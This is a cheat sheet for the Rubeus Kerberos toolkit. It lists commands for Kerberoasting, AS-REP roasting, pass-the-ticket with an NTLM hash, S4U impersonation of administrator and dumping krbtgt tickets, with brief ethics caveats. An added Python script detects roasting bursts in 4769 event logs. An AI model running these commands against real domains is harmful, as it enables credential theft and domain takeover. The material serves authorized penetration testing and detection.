CyberCheatsheets

Rubeus Cheat Sheet

Kerberos abuse toolkit for ticket requests, roasting, and delegation attacks.

Active Directory & Windows | Tags: ad, kerberos, roast, tickets | Updated 2026-06-02

Overview

Rubeus is a C# toolkit for Kerberos operations on Windows: TGT/TGS requests, Kerberoasting, AS-REP roasting, golden/silver tickets (in advanced scenarios), and delegation abuse. Run on authorized domain-joined or attacker-controlled Windows hosts in lab/pentest—AV often flags it. Ethics: ticket forging and roasting compromise the domain; never use outside written scope.

Install

Compile or use prebuilt Rubeus.exe in isolated VM

Rubeus.exe

Essential commands

Rubeus.exe asktgt /user:j.doe /password:Password1! /domain:corp.local /dc:dc01.corp.local /ptt
Rubeus.exe kerberoast /outfile:hashes.txt
Rubeus.exe asreproast /format:hashcat /outfile:asrep.txt
Rubeus.exe klist

Common workflows

Request and inject TGT (pass-the-ticket):

Rubeus.exe asktgt /user:administrator /rc4:31D6CFE0D16AE931B73C59D7E0C089C0 /domain:corp.local /ptt
Rubeus.exe klist

Kerberoast (SPN accounts):

Rubeus.exe kerberoast /stats
Rubeus.exe kerberoast /user:svc_sql /outfile:roast.txt

AS-REP roast:

Rubeus.exe asreproast /format:hashcat /outfile:asrep_hashes.txt
Rubeus.exe asreproast /user:donotpreauth /format:hashcat

TGS for service (constrained / S4U when applicable):

Rubeus.exe s4u /user:svc /rc4:<hash> /impersonateuser:administrator /msdsspn:cifs/dc01.corp.local /ptt

Monitor / harvest tickets:

Rubeus.exe monitor /interval:5 /filteruser:administrator
Rubeus.exe triage
Rubeus.exe dump /luid:0x12345 /service:krbtgt /nowrap

Renew / purge:

Rubeus.exe renew /ticket:<base64>
Rubeus.exe purge

Flags reference

asktgt: /user, /password, /rc4, /ptt
kerberoast: /user, /outfile
asreproast: /format:hashcat
s4u: /impersonateuser, /msdsspn
ptt: /ticket
purge

Tips

  • Ethics: roasting generates 4769 events; AS-REP and golden-ticket paths are critical findings—report immediately in prod tests.
  • Prefer impacket-GetUserSPNs / GetNPUsers from Linux when you lack GUI shell on Windows.
  • Use /nowrap for hashcat-friendly lines; verify -m 13100 vs 18200.
  • Run from sacrificial process or dev VM; expect EDR quarantine on corporate endpoints.
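
Detection example for the 4769 events mentioned in the first tip. This is an added example, not part of the original cheat sheet or of Rubeus: it flags an account that requests RC4 (etype 0x17) service tickets for several distinct user-account services in a short window. The CSV export layout, the TimeCreated column name, the threshold, the window and the sample rows are assumptions made for illustration.

```python
import csv
import io
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of exported Event ID 4769 records (not real log data).
SAMPLE_4769 = """\
TimeCreated,TargetUserName,ServiceName,TicketEncryptionType,IpAddress
2026-06-02T09:00:01,j.doe@CORP.LOCAL,svc_sql,0x17,::ffff:10.0.0.50
2026-06-02T09:00:02,j.doe@CORP.LOCAL,svc_web,0x17,::ffff:10.0.0.50
2026-06-02T09:00:03,j.doe@CORP.LOCAL,svc_backup,0x17,::ffff:10.0.0.50
2026-06-02T09:00:04,j.doe@CORP.LOCAL,DC01$,0x12,::ffff:10.0.0.50
2026-06-02T09:05:00,a.smith@CORP.LOCAL,svc_sql,0x12,::ffff:10.0.0.61
2026-06-02T11:30:00,a.smith@CORP.LOCAL,svc_web,0x17,::ffff:10.0.0.61
2026-06-02T09:10:00,WKS07$@CORP.LOCAL,krbtgt,0x12,::ffff:10.0.0.70
"""

RC4_HMAC = 0x17  # Kerberos encryption type 23

def find_roast_bursts(csv_text, threshold=3, window=timedelta(minutes=5)):
    """Return {requester: sorted services} for accounts that requested RC4
    tickets for >= threshold distinct user-account services within window."""
    per_user = defaultdict(list)
    for row in csv.DictReader(io.StringIO(csv_text)):
        svc = row["ServiceName"]
        # Machine accounts (trailing $) and krbtgt are routine traffic.
        if svc.endswith("$") or svc.lower() == "krbtgt":
            continue
        if int(row["TicketEncryptionType"], 16) != RC4_HMAC:
            continue
        ts = datetime.fromisoformat(row["TimeCreated"])
        per_user[row["TargetUserName"]].append((ts, svc))
    alerts = {}
    for user, reqs in per_user.items():
        reqs.sort()
        # Slide a window forward from each request and count distinct services.
        for i, (start, _) in enumerate(reqs):
            seen = {s for t, s in reqs[i:] if t - start <= window}
            if len(seen) >= threshold:
                alerts[user] = sorted(seen)
                break
    return alerts

if __name__ == "__main__":
    for user, services in find_roast_bursts(SAMPLE_4769).items():
        print(f"ALERT {user}: RC4 tickets for {len(services)} services: {services}")
```

Tune the threshold and window to the environment's baseline; legacy services that still negotiate RC4 will need an allowlist.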
